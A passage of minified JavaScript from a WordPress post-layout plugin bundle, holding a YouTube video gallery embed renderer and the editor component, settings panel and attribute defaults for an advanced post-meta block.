i=({video:e,autoplay:t=!1,loop:l=!1,mute:a=!1,showPlayerControl:i=!0,hideYoutubeLogo:n=!1,showVideoTitle:r=!0,showDescription:p=!1,videoTitleLength:c={lg:50,md:50,sm:50},videoDescriptionLength:u={lg:100,md:100,sm:100},onlyVideo:d=!1})=>{if(!e)return null;const m=["autoplay="+(t?1:0),"loop="+(l?1:0),"mute="+(a?1:0),"controls="+(i?1:0)];n&&(m.push("modestbranding=1"),m.push("rel=0"),m.push("showinfo=0")),l&&m.push(`playlist=${e.videoId}`);const g=`https://www.youtube.com/embed/${e.videoId}?${m.join("&")}`;return(0,o.createElement)("div",{className:"ultp-ytg-video-wrapper"},(0,o.createElement)("iframe",{src:g,title:e.title,frameBorder:"0",allow:"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture",allowFullScreen:!0}),!d&&s(r,e.title,c,p,e.description,u,e.videoId))};function n(e){if(!e)return"";try{return new URL(e).searchParams.get("list")||e}catch(t){return e}}function r(e,t){switch(t){case"title":return[...e].sort(((e,t)=>e.title.localeCompare(t.title,void 0,{sensitivity:"base"})));case"latest":return[...e].sort(((e,t)=>new Date(t.publishedAt).getTime()-new Date(e.publishedAt).getTime()));case"date":return[...e].sort(((e,t)=>new Date(e.publishedAt).getTime()-new Date(t.publishedAt).getTime()));case"popular":return[...e].sort(((e,t)=>(t.viewCount||0)-(e.viewCount||0)));default:return e}}const s=(e,t,l,i,n,r,s)=>(0,o.createElement)("div",{className:"ultp-ytg-content"},e&&(0,o.createElement)("div",{className:"ultp-ytg-title"},(0,o.createElement)("a",{href:`https://www.youtube.com/watch?v=${s}`,target:"_blank",rel:"noopener noreferrer"},a(t,l))),i&&(0,o.createElement)("div",{className:"ultp-ytg-description"},a(n,r)))},85977:(e,t,l)=>{"use strict";l.d(t,{Z:()=>m});var o=l(67294),a=l(53049),i=l(99838),n=l(54324),r=l(64766),s=l(2207);const{__}=wp.i18n,{Fragment:p}=wp.element,{InspectorControls:c,useBlockProps:u}=wp.blockEditor,{dateI18n:d}=wp.date;function m(e){const{setAttributes:t,name:l,attributes:m,clientId:y,className:b}=e,{blockId:v,advanceId:h,dateText:f,tagLabel:k,tagLabelShow:w,catLabelShow:x,catLabel:T,viewLabel:_,viewLabelShow:C,cmtLabel:E,cmtLabelShow:S,datePubText:P,authorShow:L,readTimeShow:I,dateShow:B,viewCountShow:U,cmtCountShow:M,catShow:A,tagShow:H,authLabel:N,metaSeparator:j,authLabelShow:Z,readTimeText:O,authImgShow:R,readTimePrefix:D,authIconShow:z,DateIconShow:F,readTimeIcon:W,viewIconShow:V,cmtIconShow:G,metaItemSort:q,catAlign:$,tagAlign:K,cmntAlign:J,viewAlign:Y,readAlign:X,authAlign:Q,dateAlign:ee,catIconShow:te,catIconStyle:le,tagIconShow:oe,tagIconStyle:ae,cmntIconStyle:ie,viewIconStyle:ne,readIconStyle:re,authIconStyle:se,dateIconStyle:pe,dateFormat:ce,metaDateFormat:ue,enablePrefix:de,currentPostId:me}=m,ge={setAttributes:t,name:l,attributes:m,clientId:y};(0,n.S)({blockId:v,clientId:y,currentPostId:me,setAttributes:t,checkRef:!1}),v&&(0,i.Kh)(m,"ultimate-post/advance-post-meta",v);const ye=$||K||J||Y||X||Q||ee,be=(0,o.createElement)("span",{className:"ultp-post-auth ultp-meta-separator"},(0,o.createElement)("span",{className:"ultp-auth-heading"},R&&(0,o.createElement)("img",{src:ultp_data.url+"assets/img/ultp-author.jpg",alt:"author-img"}),z&&r.ZP[se],Z&&(0,o.createElement)("span",{className:"ultp-auth-label"},N)),(0,o.createElement)("span",{className:"ultp-auth-name"},"Sapiente Delectus")),ve=(0,o.createElement)("span",{className:"ultp-date-meta ultp-meta-separator"},F&&(0,o.createElement)("span",{className:"ultp-date-icon"},r.ZP[pe]),"updated"==ce&&(0,o.createElement)(p,null,de&&(0,o.createElement)("span",{className:"ultp-date-prefix"},f),(0,o.createElement)("span",{className:"ultp-post-date__val"},d((0,a.De)(ue)))),"publish"==ce&&(0,o.createElement)(p,null,de&&(0,o.createElement)("span",{className:"ultp-date-prefix"},P),(0,o.createElement)("span",{className:"ultp-post-date__val"},d((0,a.De)(ue))))),he=u({className:`ultp-block-${v} ${b}`,...h&&{id:h}});return(0,o.createElement)(p,null,(0,o.createElement)(c,null,(0,o.createElement)(s.Z,{store:ge}),(0,a.dH)()),(0,o.createElement)("div",he,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("div",{className:`ultp-advance-post-meta ${ye?"ultp-contentMeta-align":"ultp-contentMeta"} ultp-post-meta-${j}`},(0,o.createElement)("div",null,q.map(((e,t)=>(0,o.createElement)(p,{key:e},"author"==e&&L&&!Q&&be,"date"==e&&B&&!ee&&ve,"cmtCount"==e&&M&&!J&&(0,o.createElement)(g,{key:e,title:"comment",labelEnable:S,labelText:E,iconEnable:G,iconVal:ie}),"viewCount"==e&&U&&!Y&&(0,o.createElement)(g,{key:e,title:"view",labelEnable:C,labelText:_,iconEnable:V,iconVal:ne}),"readTime"==e&&I&&!X&&(0,o.createElement)(g,{key:e,title:"readTime",labelEnable:D,labelText:O,iconEnable:W,iconVal:re}),"cat"==e&&A&&!$&&(0,o.createElement)(g,{title:"cat",key:e,labelEnable:x,labelText:T,iconEnable:te,iconVal:le}),"tag"==e&&H&&!K&&(0,o.createElement)(g,{key:e,title:"tag",labelEnable:w,labelText:k,iconEnable:oe,iconVal:ae}))))),(0,o.createElement)("div",null,ye&&q.map(((e,t)=>(0,o.createElement)(p,{key:e+"sort"},"author"==e&&L&&Q&&be,"date"==e&&B&&ee&&ve,"cmtCount"==e&&M&&J&&(0,o.createElement)(g,{key:e,title:"comment",labelEnable:S,labelText:E,iconEnable:G,iconVal:ie}),"viewCount"==e&&U&&Y&&(0,o.createElement)(g,{key:e,title:"view",labelEnable:C,labelText:_,iconEnable:V,iconVal:ne}),"readTime"==e&&I&&X&&(0,o.createElement)(g,{key:e,title:"readTime",labelEnable:D,labelText:O,iconEnable:W,iconVal:re}),"cat"==e&&A&&$&&(0,o.createElement)(g,{title:"cat",key:e,labelEnable:x,labelText:T,iconEnable:te,iconVal:le}),"tag"==e&&H&&K&&(0,o.createElement)(g,{key:e,title:"tag",labelEnable:w,labelText:k,iconEnable:oe,iconVal:ae})))))))))}const g=({title:e,labelEnable:t,labelText:l,iconEnable:a,iconVal:i})=>{const n="tag"==e||"cat"==e,s="readTime"==e;return(0,o.createElement)("span",{className:`ultp-${e}-wrap ultp-meta-separator`},n&&(0,o.createElement)("span",{className:`ultp-${e}-count`},a&&r.ZP[i]),n&&t&&(0,o.createElement)("span",{className:`ultp-${e}-label`},l),n&&(0,o.createElement)("span",{className:`ultp-post-${e}`},(0,o.createElement)("a",null,"Example",e)," ",(0,o.createElement)("a",null,"Example",e)),!n&&!s&&(0,o.createElement)("span",{className:`ultp-${e}-count`},a&&r.ZP[i]," 12"),s&&a&&r.ZP[i],!n&&!s&&t&&(0,o.createElement)("span",{className:`ultp-${e}-label`},l),s&&(0,o.createElement)(p,null,(0,o.createElement)("div",null,"12"),t&&(0,o.createElement)("span",{className:"ultp-read-label"},l)))}},2207:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294),a=l(53049),i=l(92637);const{__}=wp.i18n;function n({store:e}){const t=e||{name:"ultimate-post/post-title",attributes:{}};return(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"setting",title:__("Style","ultimate-post")},(0,o.createElement)(a.T,{initialOpen:!0,title:"inline",include:[{data:{type:"range",key:"metaSpacing",label:__("Item Spacing","ultimate-post"),min:0,max:50,step:1,unit:!0,responsive:!0}},{data:{type:"alignment",key:"metaAlign",disableJustify:!0,label:__("Alignment","ultimate-post")}},{data:{type:"select",key:"metaSeparator",label:__("Separator","ultimate-post"),options:[{value:"dot",label:__("Dot","ultimate-post")},{value:"slash",label:__("Slash","ultimate-post")},{value:"doubleslash",label:__("Double Slash","ultimate-post")},{value:"close",label:__("Close","ultimate-post")},{value:"dash",label:__("Dash","ultimate-post")},{value:"verticalbar",label:__("Vertical Bar","ultimate-post")},{value:"emptyspace",label:__("Empty","ultimate-post")}]}},{data:{type:"color",key:"separatorColor",label:__("Separator Color","ultimate-post")}},{data:{type:"color",key:"metaCommonColor",label:__("Common Color","ultimate-post")}},{data:{type:"typography",key:"commonTypo",label:__("Common Typography","ultimate-post")}},{data:{type:"sort",key:"metaItemSort",label:__("Meta List","ultimate-post"),options:{author:{label:__("Post Author","ultimate-post"),action:"authorShow",inner:[{type:"color",key:"authColor",label:__("Author Color","ultimate-post")},{type:"color",key:"authHovColor",label:__("Hover Color","ultimate-post")},{type:"typography",key:"authTypo",label:__("Typography","ultimate-post")},{type:"separator",label:"Avatar"},{type:"toggle",key:"authImgShow",label:__("Author Avatar","ultimate-post")},{type:"range",key:"authImgSize",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Size","ultimate-post")},{type:"range",key:"authImgRadius",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Radius","ultimate-post")},{type:"range",key:"authImgSpace",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Space X","ultimate-post")},{type:"separator",label:"Label"},{type:"toggle",key:"authLabelShow",label:__("Author Label","ultimate-post")},{type:"text",key:"authLabel",label:__("Author Label Text","ultimate-post")},{type:"color",key:"authLabelColor",label:__("Label Color","ultimate-post")},{type:"typography",key:"authLabelTypo",label:__("Typography","ultimate-post")},{type:"range",key:"authLabelSpace",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Space X","ultimate-post")},{type:"separator",label:"Icon"},{type:"toggle",key:"authIconShow",pro:!0,label:__("Enable Icon","ultimate-post")},{type:"icon",key:"authIconStyle",label:__("Select Icon","ultimate-post")},{type:"color",key:"authIconColor",label:__("Icon Color","ultimate-post")},{type:"range",key:"authIconSize",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Size","ultimate-post")},{type:"range",key:"authIconSpace",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Icon Space X","ultimate-post")},{type:"toggle",key:"authAlign",label:__("Right Align","ultimate-post")}]},date:{label:__("Post Publish Date","ultimate-post"),action:"dateShow",inner:[{type:"group",key:"dateFormat",options:[{value:"publish",label:"Publish Date"},{value:"updated",label:"Updated Date"}],justify:!0,label:__("Date Format","ultimate-post")},{type:"select",key:"metaDateFormat",label:__("Date/Time Format","ultimate-post"),options:[{value:"M j, Y",label:"Feb 7, 2022"},{value:"default_date",label:"WordPress Default Date Format",pro:!0},{value:"default_date_time",label:"WordPress Default Date & Time Format",pro:!0},{value:"g:i A",label:"1:12 PM",pro:!0},{value:"F j, Y",label:"February 7, 2022",pro:!0},{value:"F j, Y g:i A",label:"February 7, 2022 1:12 PM",pro:!0},{value:"M j, Y g:i A",label:"Feb 7, 2022 1:12 PM",pro:!0},{value:"j M Y",label:"7 Feb 2022",pro:!0},{value:"j M Y g:i A",label:"7 Feb 2022 1:12 PM",pro:!0},{value:"j F Y",label:"7 February 2022",pro:!0},{value:"j F Y g:i A",label:"7 February 2022 1:12 PM",pro:!0},{value:"j. M Y",label:"7. Feb 2022",pro:!0},{value:"j. M Y | H:i",label:"7. Feb 2022 | 1:12",pro:!0},{value:"j. F Y",label:"7. February 2022",pro:!0},{value:"j.m.Y",label:"7.02.2022",pro:!0},{value:"j.m.Y g:i A",label:"7.02.2022 1:12 PM",pro:!0},{value:"Y m j",label:"2022 7 02",pro:!0}]},{type:"color",key:"dateColor",label:__("Color","ultimate-post")},{type:"typography",key:"dateTypo",label:__("Typography","ultimate-post")},{type:"separator",label:"Prefix"},{type:"toggle",key:"enablePrefix",label:__("Enable Prefix","ultimate-post")},{type:"text",key:"datePubText",label:__("Date Text","ultimate-post")},{type:"text",key:"dateText",label:__("Date Text","ultimate-post")},{type:"color",key:"datePrefixColor",label:__("Color","ultimate-post")},{type:"separator",label:"Icon"},{type:"toggle",key:"DateIconShow",label:__("Date Icon","ultimate-post")},{type:"icon",key:"dateIconStyle",label:__("Select Icon","ultimate-post")},{type:"color",key:"dateIconColor",label:__("Color","ultimate-post")},{type:"range",key:"dateIconSize",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Icon Size","ultimate-post")},{type:"range",key:"dateIconSpace",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Icon Space X","ultimate-post")},{type:"toggle",key:"dateAlign",label:__("Right Align","ultimate-post")}]},cmtCount:{label:__("Comments","ultimate-post"),action:"cmtCountShow",inner:[{type:"color",key:"commentColor",label:__("Color","ultimate-post")},{type:"color",key:"commentHovColor",label:__("Hover Color","ultimate-post")},{type:"typography",key:"commentTypo",label:__("Typography","ultimate-post")},{type:"separator",label:"Prefix"},{type:"toggle",key:"cmtLabelShow",label:__("Prefix Enable","ultimate-post")},{type:"text",key:"cmtLabel",label:__("Prefix Text","ultimate-post")},{type:"color",key:"cmtLabelColor",label:__("Prefix Color","ultimate-post")},{type:"group",key:"commentLabelAlign",options:[{label:"After Content",value:"after"},{label:"Before Content",value:"before"}],justify:!0,label:__("Prefix Position","ultimate-post")},{type:"separator",label:"Icon"},{type:"toggle",key:"cmtIconShow",pro:!0,label:__("Enable Icon","ultimate-post")},{type:"icon",key:"cmntIconStyle",label:__("Select Icon","ultimate-post")},{type:"color",key:"cmntIconColor",label:__("Icon Color","ultimate-post")},{type:"range",key:"commentIconSize",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Icon Size","ultimate-post")},{type:"range",key:"cmntIconSpace",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Icon Space X","ultimate-post")},{type:"toggle",key:"cmntAlign",label:__("Right Align","ultimate-post")}]},viewCount:{label:__("Views","ultimate-post"),action:"viewCountShow",inner:[{type:"color",key:"viewColor",label:__("Color","ultimate-post")},{type:"color",key:"viewHovColor",label:__("Hover Color","ultimate-post")},{type:"typography",key:"viewTypo",label:__("Typography","ultimate-post")},{type:"separator",label:"Prefix"},{type:"toggle",key:"viewLabelShow",label:__("Enable Prefix","ultimate-post")},{type:"text",key:"viewLabel",label:__("Prefix Text","ultimate-post")},{type:"color",key:"viewLabelColor",label:__("Prefix Color","ultimate-post")},{type:"group",key:"viewLabelAlign",options:[{label:"After Content",value:"after"},{label:"Before Content",value:"before"}],justify:!0,label:__("Prefix Position","ultimate-post")},{type:"separator",label:"Icon"},{type:"toggle",key:"viewIconShow",label:__("Enable Icon","ultimate-post"),pro:!0},{type:"icon",key:"viewIconStyle",label:__("Select Icon","ultimate-post")},{type:"color",key:"viewIconColor",label:__("Icon Color","ultimate-post")},{type:"range",key:"viewIconSize",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Icon Size","ultimate-post")},{type:"range",key:"viewIconSpace",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Icon Space X","ultimate-post")},{type:"toggle",key:"viewAlign",label:__("Right Align","ultimate-post")}]},readTime:{label:__("Reading Time","ultimate-post"),action:"readTimeShow",inner:[{type:"color",key:"readColor",label:__("Color","ultimate-post")},{type:"color",key:"readHovColor",label:__("Hover Color","ultimate-post")},{type:"typography",key:"readTypo",label:__("Typography","ultimate-post")},{type:"separator",label:"Prefix"},{type:"toggle",key:"readTimePrefix",label:__("Enable Prefix","ultimate-post")},{type:"text",key:"readTimeText",label:__("Time Text","ultimate-post")},{type:"group",key:"readPrefixAlign",options:[{label:"After Content",value:"after"},{label:"Before Content",value:"before"}],justify:!0,label:__("Prefix Position","ultimate-post")},{type:"separator",label:"Icon"},{type:"toggle",key:"readTimeIcon",label:__("Enable Icon","ultimate-post"),pro:!0},{type:"icon",key:"readIconStyle",label:__("Select Icon","ultimate-post")},{type:"color",key:"readIconColor",label:__("Icon Color","ultimate-post")},{type:"range",key:"readIconSize",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Icon Size","ultimate-post")},{type:"range",key:"readIconSpace",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Icon Space X","ultimate-post")},{type:"toggle",key:"readAlign",label:__("Right Align","ultimate-post")}]},cat:{label:__("Category","ultimate-post"),action:"catShow",inner:[{type:"color",key:"catColor",label:__("Color","ultimate-post")},{type:"color",key:"catHovColor",label:__("Hover Color","ultimate-post")},{type:"typography",key:"catTypo",label:__("Typography","ultimate-post")},{type:"range",key:"catSpace",min:0,max:100,step:1,responsive:!0,unit:!0,label:__("Category Spacing","ultimate-post")},{type:"separator",label:"Label"},{type:"toggle",key:"catLabelShow",label:__("Category Label Show","ultimate-post")},{type:"text",key:"catLabel",label:__("Category Label Text","ultimate-post")},{type:"color",key:"catLabelColor",label:__("Label Color","ultimate-post")},{type:"range",key:"catLabelSpace",min:0,max:100,step:1,responsive:!0,unit:!0,label:__("Label Spacing","ultimate-post")},{type:"separator",label:"Icon"},{type:"toggle",key:"catIconShow",label:__("Enable Icon","ultimate-post"),pro:!0},{type:"icon",key:"catIconStyle",label:__("Select Icon","ultimate-post")},{type:"color",key:"catIconColor",label:__("Icon Color","ultimate-post")},{type:"range",key:"catIconSize",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Icon Size","ultimate-post")},{type:"range",key:"catIconSpace",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Icon Space X","ultimate-post")},{type:"toggle",key:"catAlign",label:__("Align Right","ultimate-post")}]},tag:{label:__("Tags","ultimate-post"),action:"tagShow",inner:[{type:"color",key:"tagColor",label:__("Color","ultimate-post")},{type:"color",key:"tagHovColor",label:__("Hover Color","ultimate-post")},{type:"typography",key:"tagTypo",label:__("Typography","ultimate-post")},{type:"range",key:"tagSpace",min:0,max:100,step:1,responsive:!0,unit:!0,label:__("Category Spacing","ultimate-post")},{type:"separator",label:"Label"},{type:"toggle",key:"tagLabelShow",label:__("Tag Label Show","ultimate-post")},{type:"text",key:"tagLabel",label:__("Tag Label Text","ultimate-post")},{type:"color",key:"tagLabelColor",label:__("Label Color","ultimate-post")},{type:"range",key:"tagLabelSpace",min:0,max:100,step:1,responsive:!0,unit:!0,label:__("Label Spacing","ultimate-post")},{type:"toggle",key:"tagIconShow",label:__("Enable Icon","ultimate-post"),pro:!0},{type:"separator",label:"Icon"},{type:"icon",key:"tagIconStyle",label:__("Select Icon","ultimate-post")},{type:"color",key:"tagIconColor",label:__("Icon Color","ultimate-post")},{type:"range",key:"tagIconSize",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Icon Size","ultimate-post")},{type:"range",key:"tagIconSpace",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Icon Space X","ultimate-post")},{type:"toggle",key:"tagAlign",label:__("Right Align","ultimate-post")}]}}}}],store:t})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{store:t}),(0,o.createElement)(a.Mg,{pro:!0,store:t}),(0,o.createElement)(a.iv,{store:t})))}},89471:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},authorShow:{type:"boolean",default:!0},dateShow:{type:"boolean",default:!0},cmtCountShow:{type:"boolean",default:!0},viewCountShow:{type:"boolean",default:!1},readTimeShow:{type:"boolean",default:!1},catShow:{type:"boolean",default:!1},tagShow:{type:"boolean",default:!1},metaSpacing:{type:"object",default:{lg:"15",unit:"px"},style:[{selector:"{{ULTP}} .ultp-meta-separator::after {margin: 0 {{metaSpacing}};}"},{depends:[{key:"metaSeparator",condition:"==",value:"emptyspace"}],selector:"{{ULTP}} .ultp-advance-post-meta > div { gap:{{metaSpacing}}; }"}]},metaAlign:{type:"string",default:"left",style:[{depends:[{key:"metaAlign",condition:"==",value:"right"},{key:"authAlign",condition:"==",value:!1},{key:"dateAlign",condition:"==",value:!1},{key:"cmntAlign",condition:"==",value:!1},{key:"viewAlign",condition:"==",value:!1},{key:"readAlign",condition:"==",value:!1},{key:"catAlign",condition:"==",value:!1},{key:"tagAlign",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-block-wrapper .ultp-advance-post-meta, \n          {{ULTP}} .ultp-contentMeta > div { justify-content:{{metaAlign}}; }"},{depends:[{key:"metaAlign",condition:"==",value:"center"},{key:"authAlign",condition:"==",value:!1},{key:"dateAlign",condition:"==",value:!1},{key:"cmntAlign",condition:"==",value:!1},{key:"viewAlign",condition:"==",value:!1},{key:"readAlign",condition:"==",value:!1},{key:"catAlign",condition:"==",value:!1},{key:"tagAlign",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-block-wrapper .ultp-advance-post-meta, \n          {{ULTP}} .ultp-contentMeta > div { justify-content:{{metaAlign}}; }"},{depends:[{key:"metaAlign",condition:"==",value:"left"},{key:"authAlign",condition:"==",value:!1},{key:"dateAlign",condition:"==",value:!1},{key:"cmntAlign",condition:"==",value:!1},{key:"viewAlign",condition:"==",value:!1},{key:"readAlign",condition:"==",value:!1},{key:"catAlign",condition:"==",value:!1},{key:"tagAlign",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-block-wrapper .ultp-advance-post-meta, \n          {{ULTP}} .ultp-contentMeta > div { justify-content:{{metaAlign}}; }"}]},metaSeparator:{type:"string",default:"dot"},separatorColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-meta-separator::after { color: {{separatorColor}};}"},{depends:[{key:"metaSeparator",condition:"==",value:"dot"}],selector:"{{ULTP}} .ultp-meta-separator::after { background:{{separatorColor}};}"}]},metaCommonColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-advance-post-meta  span { color:{{metaCommonColor}};}"}]},commonTypo:{type:"object",default:{openTypography:1,size:{lg:15,unit:"px"},height:{lg:20,unit:"px"}},style:[{selector:"{{ULTP}}  .ultp-advance-post-meta div > span > span"}]},metaItemSort:{type:"array",default:["author","date","cmtCount","viewCount","readTime","cat","tag"]},authColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-auth-name, \n      {{ULTP}} .ultp-advance-post-meta a.ultp-auth-name { color:{{authColor}} }"}]},authHovColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-auth-name:hover, \n        {{ULTP}} .ultp-advance-post-meta a.ultp-auth-name:hover { color:{{authHovColor}} }"}]},authTypo:{type:"object",default:{openTypography:0,size:{lg:15,unit:"px"},height:{lg:20,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-auth-name, \n        {{ULTP}} .ultp-advance-post-meta span.ultp-auth-heading, \n        {{ULTP}} .ultp-advance-post-meta a.ultp-auth-name"}]},authImgShow:{type:"boolean",default:!1},authImgSize:{type:"object",default:{lg:"18",unit:"px"},style:[{depends:[{key:"authImgShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-auth-heading img { width:{{authImgSize}}; height:{{authImgSize}} }"}]},authImgRadius:{type:"object",default:{lg:"50",unit:"px"},style:[{depends:[{key:"authImgShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-auth-heading img { border-radius:{{authImgRadius}} }"}]},authImgSpace:{type:"object",default:{lg:"5",unit:"px"},style:[{depends:[{key:"authImgShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-auth-heading img { margin-right:{{authImgSpace}} }"}]},authLabelShow:{type:"boolean",default:!0},authLabel:{type:"string",default:"Author",style:[{depends:[{key:"authLabelShow",condition:"==",value:!0}]}]},authLabelColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"authLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-auth-heading .ultp-auth-label { color:{{authLabelColor}} }"}]},authLabelTypo:{type:"object",default:{openTypography:0,size:{lg:15,unit:"px"},height:{lg:20,unit:"px"}},style:[{depends:[{key:"authLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-auth-heading .ultp-auth-label"}]},authLabelSpace:{type:"object",default:{lg:"5",unit:"px"},style:[{depends:[{key:"authLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-auth-heading .ultp-auth-label { margin-right:{{authLabelSpace}}; }"}]},authIconShow:{type:"boolean",default:!1},authIconStyle:{type:"string",default:"author1",style:[{depends:[{key:"authIconShow",condition:"==",value:!0}]}]},authIconColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"authIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-auth-heading svg { color:{{authIconColor}}; color:{{authIconColor}} }"}]},authIconSize:{type:"object",default:{lg:"16",unit:"px"},style:[{depends:[{key:"authIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-auth-heading svg { height:{{authIconSize}}; width:{{authIconSize}} }"}]},authIconSpace:{type:"object",default:{lg:"10",unit:"px"},style:[{depends:[{key:"authIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-auth-heading svg { margin-right:{{authIconSpace}} }"}]},authAlign:{type:"boolean",default:!1,style:[{depends:[{key:"authorShow",condition:"==",value:!0}]}]},dateFormat:{type:"string",default:"updated"},metaDateFormat:{type:"string",default:"M j, Y"},dateColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-date-meta span.ultp-post-date__val { color:{{dateColor}} }"}]},dateTypo:{type:"object",default:{openTypography:0,size:{lg:15,unit:"px"},height:{lg:20,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-date-meta > span"}]},enablePrefix:{type:"boolean",default:!0},datePubText:{type:"string",default:"Publish Update",style:[{depends:[{key:"enablePrefix",condition:"==",value:!0},{key:"dateFormat",condition:"==",value:"publish"}]}]},dateText:{type:"string",default:"Latest Update",style:[{depends:[{key:"dateFormat",condition:"==",value:"updated"},{key:"enablePrefix",condition:"==",value:!0}]}]},datePrefixColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"enablePrefix",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-date-meta > span.ultp-date-prefix {color:{{datePrefixColor}}}"}]},DateIconShow:{type:"boolean",default:!1},dateIconStyle:{type:"string",default:"date1",style:[{depends:[{key:"DateIconShow",condition:"==",value:!0}]}]},dateIconColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"DateIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-date-icon svg { color:{{dateIconColor}}; }"}]},dateIconSize:{type:"object",default:{lg:"16",unit:"px"},style:[{depends:[{key:"DateIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-date-icon svg { width:{{dateIconSize}}; height:{{dateIconSize}} }"}]},dateIconSpace:{type:"object",default:{lg:"10",unit:"px"},style:[{depends:[{key:"DateIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-date-icon svg { margin-right:{{dateIconSpace}} }"}]},dateAlign:{type:"boolean",default:!1,style:[{depends:[{key:"dateShow",condition:"==",value:!0}]}]},commentColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-comment-count { color:{{commentColor}} }"}]},commentHovColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-comment-count:hover { color:{{commentHovColor}} }"}]},commentTypo:{type:"object",default:{openTypography:0,size:{lg:15,unit:"px"},height:{lg:20,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-comment-count, \n        {{ULTP}} .ultp-advance-post-meta span.ultp-comment-label"}]},cmtLabelShow:{type:"boolean",default:!0},cmtLabel:{type:"string",default:"Comment",style:[{depends:[{key:"cmtLabelShow",condition:"==",value:!0}]}]},cmtLabelColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"cmtLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-comment-label { color:{{cmtLabelColor}} }"}]},commentLabelAlign:{type:"string",default:"after",style:[{depends:[{key:"commentLabelAlign",condition:"==",value:"before"},{key:"cmtLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-label {order: -1;margin-right: 5px;}"},{depends:[{key:"commentLabelAlign",condition:"==",value:"after"},{key:"cmtLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-label {order: 0; margin-left: 5px;}"}]},cmtIconShow:{type:"boolean",default:!1},cmntIconStyle:{type:"string",default:"commentCount1",style:[{depends:[{key:"cmtIconShow",condition:"==",value:!0}]}]},cmntIconColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"cmtIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-count svg { color:{{cmntIconColor}}; color:{{cmntIconColor}}}"}]},commentIconSize:{type:"object",default:{lg:"16",unit:"px"},style:[{depends:[{key:"cmtIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-count svg{ width:{{commentIconSize}}; height:{{commentIconSize}} }"}]},cmntIconSpace:{type:"object",default:{lg:"10",unit:"px"},style:[{depends:[{key:"cmtIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-count svg { margin-right:{{cmntIconSpace}} }"},{depends:[{key:"cmtIconShow",condition:"==",value:!0},{key:"cmtLabelShow",condition:"==",value:!0},{key:"commentLabelAlign",condition:"==",value:"before"}],selector:"{{ULTP}} .ultp-comment-count svg { margin:0px {{cmntIconSpace}} } \n          {{ULTP}} .ultp-comment-label {margin:0px !important;}"}]},cmntAlign:{type:"boolean",default:!1,style:[{depends:[{key:"cmtCountShow",condition:"==",value:!0}]}]},viewColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-view-count { color:{{viewColor}} 